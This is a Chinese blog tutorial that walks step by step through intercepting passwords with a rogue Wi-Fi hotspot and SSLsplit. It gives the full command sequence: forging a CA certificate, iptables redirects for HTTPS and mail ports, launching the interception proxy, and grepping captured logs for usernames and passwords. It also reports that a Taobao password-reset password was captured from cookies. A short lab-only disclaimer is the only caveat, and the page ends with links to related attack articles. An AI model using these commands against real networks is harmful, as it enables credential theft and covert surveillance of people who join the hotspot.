通过SSL中间人证书和钓鱼WIFI监听密码演示

最新推荐文章于 2024-05-11 03:09:38 发布
最新推荐文章于 2024-05-11 03:09:38 发布
阅读量2.9k 收藏 2
点赞数
分类专栏: 网络安全 文章标签: SSL 中间人 钓鱼WiFi 监听
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsls200808/article/details/48913809
版权
本文参考:
http://www.freebuf.com/tools/48016.html
http://www.freebuf.com/articles/web/5929.html
声明:本文仅建议在实验环境下使用,读者在其它环境参考本文使用产生的问题由读者承担!
注意:本文的命令如果提示权限问题,请在命令前加sudo

一、本文用到软件和硬件条件

Ubuntu15.04(自带OpenSSL)
360WiFi一代(模拟钓鱼WiFi)
SSLsplit(后文会提到如何安装)
Git(下载SSLStrip源码必备)

二、WiFi热点的建立

笔者使用的是修改/etc/NetworkManager/system-connections/配置文件的方法
参考文章:
http://blog.csdn.net/gsls200808/article/details/39370597
http://blog.csdn.net/gsls200808/article/details/39403215

三、安装sslsplit

1.安装git

apt-get install git


2.下载sslsplit源码 
git clone https://github.com/droe/sslsplit.git /opt/sslsplit


3.下载编译sslsplit源码的依赖包libssl-dev,libevent-dev 
apt-get install libssl-dev libevent-dev


4.切换到sslsplit目录 
cd /opt/sslsplit


5.编译和安装 
make
make install


6.查看/检测是否安装成功,帮助命令 
sslsplit -h


四、生成中间人的数字证书

1.生成key 
openssl genrsa -out ca.key 2048

2.然后自签名用生成的key生成公钥证书: 
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

其中COMMON NAME填:Test_SSL_Monitor,其它任意

五、配置流量转发

1.打开端口流量转发,临时打开重启后恢复

sysctl -w net.ipv4.ip_forward=1


2.清除转发规则 
iptables -F


3.iptables流量转发 
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443


4.查看刚建立的转发规则 
iptables -t nat -L


六、启动sslsplit

创建目录以便启动,-S指定的目录为-j指定目录的子目录

rm -rf /opt/sslsplit/test*
mkdir /opt/sslsplit/test1
mkdir /opt/sslsplit/test1/logdir
启动SSLSplit
sslsplit -D -l connect.log -j /opt/sslsplit/test1 -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080


七、劫持实验

1.客户端登陆劫持尝试
支付宝安卓客户端:失败 有客户端证书失败的提示 原因:支付宝采用客户端和服务器段证书双向校验
12306安卓客户端:成功 无证书提示 但是密码都是经过加密的

2.网页劫持尝试
淘宝重置密码界面:成功 有证书提示 密码可直接获取,密码位于Cookie的_tb_token_的_fm-pa-_0-n和_fm-pa-_0-c值


八、还原操作

1.关闭SSLSplit
Ctrl+C
如果一不小心把终端关了可以杀进程,如下 
ps -aux|grep ssl
kill pid


2.清除建立的转发规则 
iptables -t nat -F


3.重新设置Wifi热点
笔者是断开重连





九、实用命令

1.在日志文件中搜索用户名密码 
cd /opt/sslsplit/test1/logdir
ls -al
cat 20151005T010002Z-[10.42.0.207]:40281-[202.108.23.188]:443.log #这句自行替换
cd /opt/sslsplit/test1/logdir
find -name "*.log" |xargs grep user
find -name "*.log" |xargs grep password
find -name "*.log" |xargs grep login
find -name "*.log" |xargs grep 自己的用户名或者密码


2.拷贝日志目录到自己的目录并修改权限 
mkdir ~/temp
cp -rf /opt/sslsplit/test1/logdir ~/temp
cd ~/temp
chmod 777 logdir
cd logdir
chmod 777 *.log


十、乱码解决

一般是gzip压缩后的结果,下面是python代码 

# -*- coding: UTF-8 -*-  
import StringIO
import gzip


file = open('/home/hadoop/temp/test.log','rb')
try:
     text = file.read( )
     print text

     #print all_the_text.split('\r\n\r\n')
     #print all_the_text.split('\r\n\r\n')[4]
     #print all_the_text.split('\r\n\r\n')[-2].split('6f4\r\n')[1].split('\r\n')
     #\x1f\x8b\x08\x00开头是gzip压缩后的数据
     #大段落分割用的是'\r\n\r\n'
     #开头6f4\r\n\x1f\x8b\x08\x00
     #结束\x00\x00\r\n0
     #需要截取的范围x1f\x8b\x08\x00~\x00\x00


     cpdata = text.split('\r\n\r\n')[-2].split('6f4\r\n')[1].split('\r\n')[0]
     cpstream = StringIO.StringIO(cpdata)
     g = gzip.GzipFile(fileobj=cpstream)
     data = g.read()
     print data
finally:
     file.close( )



gsls200808
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSL中间人攻击(MITM)
未晚的专栏
04-16 8907
老板要求,实验几个ssl中间人攻击的工具,简单的记录下实验过程和一些简单的原理,已经使用过的几个工具的使用方法和特点,以备使用。 实验环境: 攻击机: 操作系统:kali-linux虚拟机 IP地址:192.168.138.131。 目标机: 操作系统:windows XP虚拟机 IP地址:192.168.138.128 网络: VM-NAT,网关192.168.138.2
SSL/TLS中间人攻击
raynah的博客
06-18 738
利用openssl生成证书私钥(伪造证书) openssl genrsa -out ca.key 2048 2048是长度 利用私钥签名生成证书(证书服务器的根证书) openssl req -new -x509 -days 1096 -key ca.key -out ca.crt new生成新的,509是标准,days有效时问,key用哪个私钥生成,crt是证书格式 这里提示填写国家名,省,城市,组织名称,组织单位名字,常用的FQDN名称,邮箱地址填好就可以了 证书生成完毕 ...
ssl中间人攻击
qq_44890392的博客
06-27 2529
攻击机:kali; ip地址:192.168.0.130 目标机:windows7虚拟机; ip地址:192.168.0.131 vm网关:192.168.0.2 SSL为安全套阶层协议。使用加密的方式保证链接的安全性。SSL协议包括用于数据传输SSL记录协议和用于建立安全链接的SSL握手协议。SSL记录协议使用对称密码体系进行数据的加密,秘钥由SSL握手协议通过非对称加密方式进行交换。 ssl中间人攻击,顾名思义,就是在SSL回话中,作为客户端和服务器端中间的代理,进行
2024年最全kali无线渗透之监听wifi网络1_kali 查看wifi发送的信息,网络安全音频面试
最新发布
2401_84300239的博客
05-11 1041
是一个与802.11标准的无线网络分析有关的安全软件,主要功能包括网络侦测、数据包嗅探、WEP和破解。工具可以工作在任何支持监听模式的无线网卡上,并嗅探802.11a802.11b802.11g的数据。下面将对该工具进行详细介绍。是一个套件,在该套件中包括很多个小工具,如表3-2所示。
SSL中间人监测关键技术---SSL会话劫持
chengfangang的专栏
02-25 2305
数据流重定向技术是SSL中间人监测的基础,该技术的使用使得被监测主机与SSL服务器的通信流量都会经过监测主机。对于一般的中间人监测来说,再加上数据转发机制就已经足够。但对于SSL中间人监测来说,仅仅通过数据流重定向得到的都是经过加密后的数据,无法直接用来进行HTTP协议解析。故此必需使用SSL会话劫持技术,才能得到被监测主机与SSL服务器之间通信数据的明文。 自SSL问世以来,在其应用范围越来
Web-安全渗透全套教程中间人.zip
05-22
"Web-安全渗透全套教程中间人.mp4"这个视频教程很可能会涵盖实战演练,让你有机会模拟攻击场景,亲身体验如何检测和防御中间人攻击。通过这样的学习,你可以提高自己的安全意识,更好地保护Web应用和用户数据不受...
一个 Fake Wifi 攻击方案.zip
09-23
3. **无线网络嗅探**:攻击者使用Wireshark等工具监听网络流量,寻找可利用的连接信息,如SSID和密码。 4. **社会工程学**:Fake WiFi攻击利用了人们倾向于连接到最方便或最熟悉的网络的心理,这在社会工程学中称为...
Python-WTF可以快速为您的服务器提供SSL支持
08-10
SSL是一种网络安全协议,它通过公钥和私钥技术来建立一个加密的数据通道,使得网络通信更加安全,防止中间人攻击和数据被窃取。 在Python开发中,尤其是在构建Web应用时,启用SSL是非常必要的,因为这可以提供以下...
http和https的区别详解.zip
03-27
同时,它还提供了身份验证机制,确保用户与正确的服务器进行交互,防止中间人攻击和钓鱼网站。 在安全性方面,HTTP没有任何加密措施,因此数据容易被监听或篡改。而HTTPS使用SSL/TLS加密,即使数据被截获,攻击者也...
http和https的区别以及https使用到的安全技术.docx
06-03
- 身份验证:服务器的数字证书确保了用户访问的是真实的网站,避免了中间人攻击和钓鱼网站。 - 完整性检查:保证了数据在传输过程中的完整性和一致性,防止数据被篡改。 8. HTTPS的局限性 虽然HTTPS提供了强大的...
SSL-CCS注入漏洞分析与中间人攻击实现
08-23
SSL-CCS注入漏洞分析与中间人攻击实现。有不对的地方欢迎指正
SSL破解工具SSLsplit.zip
07-16
SSLsplit 是一个针对SSL/TLS加密的网络连接进行攻击,为网络取证和渗透测试的工具。它会终止SSL / TLS和启动一个新的连接到原来的目的地,记录所有传输的数据。它支持普通的TCP和SSL,HTTP和HTTPS,和IPv4和IPv6。为SSL和HTTPS,它生成并签署伪造X509v3证书上飞使用的原始凭证的主题DN和subjectAltName扩展。它支持服务器名称显示,RSA,DSA和ECDSA密钥,DHE 和ECDHE密码套件。如果私钥是可用的,它也可以使用现有的证书SSLsplit is a tool that performs man-in-the-middle attacks against SSL/TLS encrypted network connections for network forensics and penetration testing. It terminates SSL/TLS and initiates a new connection to the original destination, logging all data transmitted. It supports plain TCP and SSL, HTTP and HTTPS, and IPv4 and IPv6. For SSL and HTTPS, it generates and signs forged X509v3 certificates on-the-fly using the original certificate's subject DN and subjectAltName extension. It supports Server Name Indication, RSA, DSA, and ECDSA keys, and DHE and ECDHE cipher suites. It can also use existing certificates if the private key is available.
ubuntu下获取wifi加密密码(亲测OK,仅供学习)
02-01
ubuntu下getWIFI密码实战笔记,亲测OK,欢迎大家下载学习
sslstrip2:Leonardo Nve的原始SSLstrip +代码的镜像
05-09
SSLstrip + 这只是Leonardo Nve原始SSLstrip +代码的一面镜子,由于插销订单,该代码已被删除。 为此,您还需要一个DNS服务器来逆转代理所做的更改,您可以在找到它。 描述 这是[Moxie的SSLstrip]( )的新版本,具有避免HTTP严格传输安全性(HSTS)保护机制的新功能。 此版本将HTTPS更改为HTTP,将其作为原始版本,再加上html代码处的主机名,以避免使用HSTS。 有关更多信息,请查看我在BlackHat ASIA 2014上的幻灯片[进攻性:探索DNS服务器更改]( )。 演示视频,为: :
WIFI连接状态监听
07-08
实现WIFI状态的监听,开启关闭的控制,扫描周围wifi以及获取本机连接过的wifi
ssl原理 SSL中间人监测关键技术---SSL会话劫持
空杯心态_虚怀若谷
09-06 485
数据流重定向技术是SSL中间人监测的基础,该技术的使用使得被监测主机与SSL服务器的通信流量都会经过监测主机。对于一般的中间人监测来说,再加上数据转发机制就已经足够。但对于SSL中间人监测来说,仅仅通过数据流重定向得到的都是经过加密后的数据,无法直接用来进行HTTP协议解析。故此必需使用SSL会话劫持技术,才能得到被监测主机与SSL服务器之间通信数据的明文。 自SSL问世以来,在其应用范围越
监听WiFi网络
2301_77163694的博客
01-10 1998
Aircrack-ng是一个套件,在这个套件中包括很多个小工具,主要功能是网络的侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。包名称描述破解WEP以及WPA(字典)秘钥通过已知秘嗅探钥来破解WEP和WPA嗅探数据airmon-ng将网卡设置成监听模式数据包嗅探,将无线网络数据输送到PCAP和IVS文件并显示网络信息airtun-ng创建虚拟管道airolib-ng保存,管理ESSID密码列表创建数据包注入用的加密包Tools混合,转换工具airbase-ng。
最新kali关于无线网卡监听失败扫描不到wifi的解决方法
weixin_74711824的博客
02-01 8498
在进行wifi监听时,出现监听不到WiFi的一些解决方法。
Android SSL安全分析:中间人攻击与防范
"这篇报告名为'An Analysis of Android SSL (In)Security',由李宁和程玲撰写,深入探讨了Android系统中SSL安全性的不足,特别关注了SSL/TLS协议在防止中间人攻击中的作用以及Android应用可能存在的安全隐患。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值